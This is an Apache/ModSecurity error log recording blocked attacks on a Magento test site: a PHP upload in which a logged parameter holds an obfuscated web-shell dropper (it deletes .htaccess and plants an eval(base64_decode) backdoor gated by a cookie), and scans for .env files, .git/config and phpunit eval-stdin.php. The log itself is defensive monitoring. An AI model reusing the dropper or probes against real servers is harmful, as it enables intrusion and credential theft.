[Fri Dec 19 06:39:03.312770 2025] [:error] [pid 834991] [client 37.112.219.146:45688] [client 37.112.219.146] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/i/1/i188364f428d25.phar"] [unique_id "aUTk93YhSR2R3yAhScQw7QAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 19 06:39:03.315003 2025] [:error] [pid 834991] [client 37.112.219.146:45688] [client 37.112.219.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/i/1/i188364f428d25.phar"] [unique_id "aUTk93YhSR2R3yAhScQw7QAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 19 06:39:03.315266 2025] [:error] [pid 834991] [client 37.112.219.146:45688] [client 37.112.219.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/i/1/i188364f428d25.phar"] [unique_id "aUTk93YhSR2R3yAhScQw7QAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 19 06:39:03.701549 2025] [:error] [pid 834991] [client 37.112.219.146:45688] [client 37.112.219.146] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: i188364f428d25.php8 found within FILES:custom_attributes[country_id]: i188364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUTk93YhSR2R3yAhScQw7gAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/i/1/i188364f428d25.phar
[Fri Dec 19 06:39:03.702226 2025] [:error] [pid 834991] [client 37.112.219.146:45688] [client 37.112.219.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUTk93YhSR2R3yAhScQw7gAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/i/1/i188364f428d25.phar
[Fri Dec 19 06:39:03.702436 2025] [:error] [pid 834991] [client 37.112.219.146:45688] [client 37.112.219.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUTk93YhSR2R3yAhScQw7gAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/i/1/i188364f428d25.phar
[Fri Dec 19 06:39:03.972813 2025] [:error] [pid 834991] [client 37.112.219.146:45688] [client 37.112.219.146] ModSecurity: Rule 7fe1871a9be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/i/1/i188364f428d25.php8"] [unique_id "aUTk93YhSR2R3yAhScQw7wAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 19 06:39:03.973256 2025] [:error] [pid 834991] [client 37.112.219.146:45688] [client 37.112.219.146] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/i/1/i188364f428d25.php8"] [unique_id "aUTk93YhSR2R3yAhScQw7wAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 19 06:39:03.975554 2025] [:error] [pid 834991] [client 37.112.219.146:45688] [client 37.112.219.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/i/1/i188364f428d25.php8"] [unique_id "aUTk93YhSR2R3yAhScQw7wAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 19 06:39:03.975738 2025] [:error] [pid 834991] [client 37.112.219.146:45688] [client 37.112.219.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/i/1/i188364f428d25.php8"] [unique_id "aUTk93YhSR2R3yAhScQw7wAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 19 11:20:37.566148 2025] [:error] [pid 834992] [client 170.64.149.111:27942] [client 170.64.149.111] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUUm9WUkfshjVnOZlCKILwAAAAI"]
[Fri Dec 19 11:20:37.566491 2025] [:error] [pid 834992] [client 170.64.149.111:27942] [client 170.64.149.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUUm9WUkfshjVnOZlCKILwAAAAI"]
[Fri Dec 19 11:20:37.566658 2025] [:error] [pid 834992] [client 170.64.149.111:27942] [client 170.64.149.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUUm9WUkfshjVnOZlCKILwAAAAI"]
[Fri Dec 19 11:20:38.036025 2025] [authz_core:error] [pid 834992] [client 170.64.149.111:27942] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
[Fri Dec 19 11:20:38.267918 2025] [authz_core:error] [pid 834992] [client 170.64.149.111:27942] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/laravel-filemanager
[Fri Dec 19 11:20:38.732760 2025] [:error] [pid 834992] [client 170.64.149.111:27942] [client 170.64.149.111] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "662"] [id "920340"] [msg "Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aUUm9mUkfshjVnOZlCKINAAAAAI"]
[Fri Dec 19 11:20:39.445719 2025] [:error] [pid 834992] [client 170.64.149.111:27942] [client 170.64.149.111] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUUm92UkfshjVnOZlCKINwAAAAI"]
[Fri Dec 19 11:20:39.446023 2025] [:error] [pid 834992] [client 170.64.149.111:27942] [client 170.64.149.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUUm92UkfshjVnOZlCKINwAAAAI"]
[Fri Dec 19 11:20:39.446205 2025] [:error] [pid 834992] [client 170.64.149.111:27942] [client 170.64.149.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUUm92UkfshjVnOZlCKINwAAAAI"]
[Fri Dec 19 21:13:42.364343 2025] [:error] [pid 839889] [client 45.148.10.159:46614] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUWx9uQyAZTrDtMMzDspTgAAAAg"]
[Fri Dec 19 21:13:42.364558 2025] [:error] [pid 839889] [client 45.148.10.159:46614] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUWx9uQyAZTrDtMMzDspTgAAAAg"]
[Fri Dec 19 21:13:42.364721 2025] [:error] [pid 839889] [client 45.148.10.159:46614] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUWx9uQyAZTrDtMMzDspTgAAAAg"]
[Fri Dec 19 21:13:42.649331 2025] [:error] [pid 839891] [client 45.148.10.159:46620] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aUWx9isJmHHpY8o6lTr3rwAAAAo"]
[Fri Dec 19 21:13:42.649563 2025] [:error] [pid 839891] [client 45.148.10.159:46620] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aUWx9isJmHHpY8o6lTr3rwAAAAo"]
[Fri Dec 19 21:13:42.649725 2025] [:error] [pid 839891] [client 45.148.10.159:46620] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aUWx9isJmHHpY8o6lTr3rwAAAAo"]
[Fri Dec 19 21:13:42.681234 2025] [:error] [pid 839891] [client 45.148.10.159:46620] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /env/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aUWx9isJmHHpY8o6lTr3sAAAAAo"]
[Fri Dec 19 21:13:42.681419 2025] [:error] [pid 839891] [client 45.148.10.159:46620] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aUWx9isJmHHpY8o6lTr3sAAAAAo"]
[Fri Dec 19 21:13:42.681565 2025] [:error] [pid 839891] [client 45.148.10.159:46620] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aUWx9isJmHHpY8o6lTr3sAAAAAo"]
[Fri Dec 19 21:13:42.829825 2025] [:error] [pid 834994] [client 45.148.10.159:46636] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aUWx9j9c0oSQ-M066kcvtQAAAAQ"]
[Fri Dec 19 21:13:42.830063 2025] [:error] [pid 834994] [client 45.148.10.159:46636] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aUWx9j9c0oSQ-M066kcvtQAAAAQ"]
[Fri Dec 19 21:13:42.830238 2025] [:error] [pid 834994] [client 45.148.10.159:46636] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aUWx9j9c0oSQ-M066kcvtQAAAAQ"]
[Fri Dec 19 21:13:42.867459 2025] [authz_core:error] [pid 834994] [client 45.148.10.159:46636] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Fri Dec 19 21:13:45.923441 2025] [authz_core:error] [pid 839886] [client 45.148.10.159:46646] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Fri Dec 19 21:13:45.994897 2025] [:error] [pid 839886] [client 45.148.10.159:46646] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aUWx-Vi5HgpQVmqH-SUAjQAAAAc"]
[Fri Dec 19 21:13:45.995115 2025] [:error] [pid 839886] [client 45.148.10.159:46646] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aUWx-Vi5HgpQVmqH-SUAjQAAAAc"]
[Fri Dec 19 21:13:45.995277 2025] [:error] [pid 839886] [client 45.148.10.159:46646] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aUWx-Vi5HgpQVmqH-SUAjQAAAAc"]
[Fri Dec 19 21:13:47.656089 2025] [:error] [pid 834992] [client 45.148.10.159:46658] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aUWx-2UkfshjVnOZlCKIxQAAAAI"]
[Fri Dec 19 21:13:47.656312 2025] [:error] [pid 834992] [client 45.148.10.159:46658] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aUWx-2UkfshjVnOZlCKIxQAAAAI"]
[Fri Dec 19 21:13:47.656467 2025] [:error] [pid 834992] [client 45.148.10.159:46658] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aUWx-2UkfshjVnOZlCKIxQAAAAI"]
[Fri Dec 19 21:13:47.715536 2025] [:error] [pid 834992] [client 45.148.10.159:46658] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aUWx-2UkfshjVnOZlCKIxgAAAAI"]
